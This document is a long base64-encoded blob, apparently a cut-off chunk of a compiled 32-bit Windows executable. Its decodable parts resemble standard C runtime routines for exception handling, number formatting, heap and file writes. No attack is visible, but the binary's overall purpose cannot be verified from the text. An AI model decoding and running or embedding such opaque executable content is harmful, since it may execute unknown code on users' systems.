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P9wFOg+////g8QMXYtEJAiLVCQQiQK4AwAAAMNVi0wkCIsp/3Ec/3EY/3Eo6BX///+DxAxdwgQAVVZXU4vqM8Az2zPSM/Yz///RW19eXcOL6ovxi8FqAeiPJgAAM8Az2zPJM9Iz///mVYvsU1ZXagBSaGaPABBR6IppAABfXltdw1WLbCQIUlH/dCQU6LX+//+DxAxdwggAVYvsi0UIhcB0EoPoCIE43d0AAHUHUOhWtv//WV3DVYvsU1ZXM/+74wAAAI0EO5krwovw0f5qVf809egmARD/dQjonAAAAIPEDIXAdBN5BY1e/+sDjX4BO/t+0IPI/+sHiwT17CYBEF9eW13DVYvsg30IAHQd/3UI6KH///9ZhcB4ED3kAAAAcwmLBMXIHwEQXcMzwF3DVYvsoRCiARAzBQhwARB0GzPJUVFR/3Uc/3UY/3UU/3UQ/3UM/3UI/9Bdw/91HP91GP91FP91EP91DP91COiU////WVD/FfwAARBdw1WL7FaLdRAzwIX2dF6LTQxTV4t9CGpBW2paWiv5iVUQ6wNqWloPtwQPZjvDcg1mO8J3CIPAIA+30OsCi9APtwFmO8NyDGY7RRB3BoPAIA+3wIPBAk50CmaF0nQFZjvQdMEPt8gPt8JfK8FbXl3DzMzMzMzMzMzMzMzMzMyAeg4FdRFmi51c////gM8CgOf+sz/rBGa7PxNmiZ1e////2a1e////u2xAARDZ5YmVbP///5vdvWD////GhXD///8Am4qNYf///9Dh0PnQwYrBJA/XD77AgeEEBAAAi9oD2IPDEP8jgHoOBXURZoudXP///4DPAoDn/rM/6wRmuz8TZomdXv///9mtXv///7tsQAEQ2eWJlWz///+b3b1g////xoVw////ANnJio1h////2eWb3b1g////2cmKrWH////Q5dD90MWKxSQP14rg0OHQ+dDBisEkD9fQ5NDkCsQPvsCB4QQEAACL2gPYg8MQ/yPowQAAANnJ3djD6LcAAADr9t3Y3djZ7sPd2N3Y2ejD271i////261i////9oVp////QHQIxoVw////B8PGhXD///8B3AVkQAEQw9nJ271i////261i////9oVp////QHQJxoVw////B+sHxoVw////Ad7Bw9u9Yv///9utYv////aFaf///0B0INnJ271i////261i////9oVp////QHQJxoVw////B+sHxoVw////Ad7Bw93Y3djbLVBAARCAvXD///8AfwfGhXD///8BCsnDCsl0Atngw8zMzMzMzFWL7IPE4IlF4ItFGIlF8ItFHIlF9OsJVYvsg8TgiUXg3V34iU3ki0UQi00UiUXoiU3sjUUIjU3gUFFS6Bw0AACDxAzdRfhmgX0IfwJ0A9ltCMnDzMzMzMzMzMzMzMzMzNnA2fzc4dnJ2eDZ8Nno3sHZ/d3Zw4tUJASB4gADAACDyn9miVQkBtlsJAbDqQAACAB0BrgHAAAAw9wFgEABELgBAAAAw4tCBCUAAPB/PQAA8H90A90Cw4tCBIPsCg0AAP9/iUQkBotCBIsKD6TIC8HhC4lEJASJDCTbLCSDxAqpAAAAAItCBMOLRCQIJQAA8H89AADwf3QBw4tEJAjDZoE8JH8CdAPZLCRaw2aLBCRmPX8CdB5mg+AgdBWb3+Bmg+AgdAy4CAAAAOjp/v//WsPZLCRaw4PsCN0UJItEJASDxAglAADwf+sUg+wI3RQki0QkBIPECCUAAPB/dD09AADwf3RfZosEJGY9fwJ0KmaD4CB1IZvf4GaD4CB0GLgIAAAAg/oddAfoi/7//1rD6G3+//9aw9ksJFrD3QWsQAEQ2cnZ/d3Z2cDZ4dwdnEABEJvf4J64BAAAAHPH3A28QAEQ67/dBaRAARDZydn93dnZwNnh3B2UQAEQm9/gnrgDAAAAdp7cDbRAARDrljPAw8yLVCQMi0wkBIXSdH8PtkQkCA+6JbyGARABcw2LTCQMV4t8JAjzqutdi1QkDIH6gAAAAHwOD7olEHABEAEPgjMzAABXi/mD+gRyMffZg+EDdAwr0YgHg8cBg+kBdfaLyMHgCAPBi8jB4BADwYvKg+IDwekCdAbzq4XSdAqIB4PHAYPqAXX2i0QkCF/Di0QkBMOhhKEBEFZqFF6FwHUHuAACAADrBjvGfQeLxqOEoQEQagRQ6Fqt//+jgKEBEFlZhcB1HmoEVok1hKEBEOhBrf//o4ChARBZWYXAdQVqGlhewzPSucB5ARCJDAKDwSCNUgSB+UB8ARB9B6GAoQEQ6+gzwF7D6D4wAACAPeSGARAAdAXoJzMAAP81gKEBEOgysP//gyWAoQEQAFnDuMB5ARDDVYvsVot1CLnAeQEQO/FyIoH+IHwBEHcai8YrwcH4BYPAEFDoDun//4FODACAAABZ6wqNRiBQ/xXYAAEQXl3DVYvsi0UIg/gUfRaDwBBQ6OPo//+LRQxZgUgMAIAAAF3Di0UMg8AgUP8V2AABEF3DVYvsi0UIucB5ARA7wXIfPSB8ARB3GIFgDP9///8rwcH4BYPAEFDoBur//1ldw4PAIFD/FdwAARBdw1WL7ItNCItFDIP5FH0TgWAM/3///41BEFDo2en//1ldw4PAIFD/FdwAARBdw1WL7ItFCIXAdRXoD77//8cAFgAAAOh/uv//g8j/XcOLQBBdw1WL7ItNCIP5/nUN6Oq9///HAAkAAADrOIXJeCQ7DSSiARBzHIvBg+EfwfgFweEGiwSFEIcBEA++RAgEg+BAXcPotb3//8cACQAAAOgluv//M8Bdw2oQaLhgARDoZqz//zPbiV3ki3UIg/7+dRfoVL3//4kY6IG9///HAAkAAADptgAAAIX2D4iXAAAAOzUkogEQD4OLAAAAi97B+wWL/oPnH8HnBosEnRCHARAPvkQ4BIPgAXUK6Au9//+DIADralbo6jEAAFmDZfwAiwSdEIcBEPZEOAQBdBP/dRD/dQxW6F4AAACDxAyL+OsW6Am9///HAAkAAADoyrz//4MgAIPP/4l95MdF/P7////oCgAAAIvH6yiLdQiLfeRW6AozAABZw+ievP//iRjoy7z//8cACQAAAOg7uf//g8j/6Mmr///DVYvsuPAaAADoVjQAAKEIcAEQM8WJRfyDpUTl//8Ai0UIi00MVjP2iYU45f//VzP/iY0w5f//ibVA5f//OXUQdQczwOkNCAAAhcl1H+gyvP//ITDoX7z//8cAFgAAAOjPuP//g8j/6eoHAACL0IvIwfoFg+EfweEGiZUo5f//U4sUlRCHARCJjSTl//+KXBEkAtvQ+4D7AnQFgPsBdSuLRRD30KgBdRzo17v//yEw6AS8///HABYAAADodLj//+mIBwAAi4U45f//9kQRBCB0D2oCagBqAFDohQgAAIPEEP+1OOX//+jT/f//WYXAD4RQAwAAi4Uo5f//i40k5f//iwSFEIcBEPZEAQSAD4QyAwAA6Nm+//8zyYtAbDmIqAAAAI2FGOX//1CLhSjl//8PlMGJjTzl//+LjSTl//+LBIUQhwEQ/zQB/xUEAQEQhcAPhO4CAAA5tTzl//90CITbD4TeAgAA/xUAAQEQi5Uw5f//M8khjTjl//+JhRDl//+JjTTl//+JlSzl//85TRAPhoEGAACLhSzl//8z0omVQOX//8eFFOX//woAAAAhvTzl//+E2w+FrgEAAIoQM8CLjSTl//+A+goPlMCJhRjl//+LhSjl//+LBIUQhwEQiYU85f//OXwBOHQcikQBNIhF9IuFPOX//4hV9WoCIXwBOI1F9FDrWg++wlDoKBgAAFmFwHREi4Uw5f//i5Us5f//K8IDRRCD+AEPhtsBAABqAlKNhTTl//9Q6McxAACDxAyD+P8PhAUDAACLhSzl//9A/4VA5f//6yZqAf+1LOX//42FNOX//1DomDEAAIPEDIP4/w+E1gIAAIuFLOX//zPJQP+FQOX//1FRagWJhSzl//+NRfRQagGNhTTl//9QUf+1EOX///8VdAABEImFPOX//4XAD4SVAgAAagCNjTjl//9Ri40k5f//UI1F9FCLhSjl//+LBIUQhwEQ/zQB/xUsAAEQhcAPhEwBAACLtUDl//+LjUTl//8D8YuFPOX//zmFOOX//w+MSQIAADm9GOX//3RLi40k5f//jYU45f//agBQagGNRfTGRfQNUIuFKOX//4sEhRCHARD/NAH/FSwAARCFwA+E7QAAAIO9OOX//wEPjPcBAAD/hUTl//9Gi4005f//6YYAAACA+wF0BYD7AnUzD7cIM9JmO40U5f//iY005f//D5TCg8ACiZU85f//i5VA5f//g8ICiYUs5f//iZVA5f//gPsBdAWA+wJ1S1HoZjAAAFmLjTTl//9mO8F1dYPGAjm9POX//3Qiag1YUImFNOX//+hAMAAAWYuNNOX//2Y7wXVPRv+FROX//4uVQOX//4uFLOX//ztVEA+Cqf3//+lFAQAAi50o5f//RooCi5Uk5f//iwydEIcBEIhECjSLBJ0QhwEQx0QCOAEAAADpFwEAAP8VHAABEIv46QoBAACLhSjl//+LDIUQhwEQi4Uk5f//9kQIBIAPhHUDAACLlTDl//8z/4m9NOX//4TbD4UOAQAAi10QiZU45f//hdsPhI0DAAAzyY299Ov//4vCiY085f//K4Uw5f//O8NzRIoKQkCIjR/l//+A+QqJlTjl//+LjTzl//91C/+FROX//8YHDUdBipUf5f//iBdHi5U45f//QYmNPOX//4H5/xMAAHK4i40k5f//jYX06///K/iNhSDl//9qAFBXjYX06///UIuFKOX//4sEhRCHARD/NAH/FSwAARCFwA+EE////wO1IOX//zm9IOX//3wWi5U45f//i8IrhTDl//87ww+CQf///4u9NOX//4uNROX//4X2D4X1AgAAhf8PhKwCAABqBVs7+w+FmAIAAOhEt///xwAJAAAA6AW3//+JGOnGAgAAi8qA+wIPheoAAAA5dRAPhnwCAADHhRTl//8KAAAAg6UY5f//AI2d9Ov//4vBag0rwouVGOX//147RRBzMw+3OYPAAoPBAmY7vRTl//91EIOFROX//wJmiTODwwKDwgJmiTuDwgKDwwKB+v4TAAByyI2F9Ov//4mNPOX//4uNJOX//yvYagCNhSDl//9QU42F9Ov//1CLhSjl//+LBIUQhwEQ/zQB/xUsAAEQi7VA5f//i7005f//hcAPhPL9//8DtSDl//+JtUDl//85nSDl//8PjPH+//+LjTzl//+LwYuVMOX//yvCO0UQD4Iu////6dP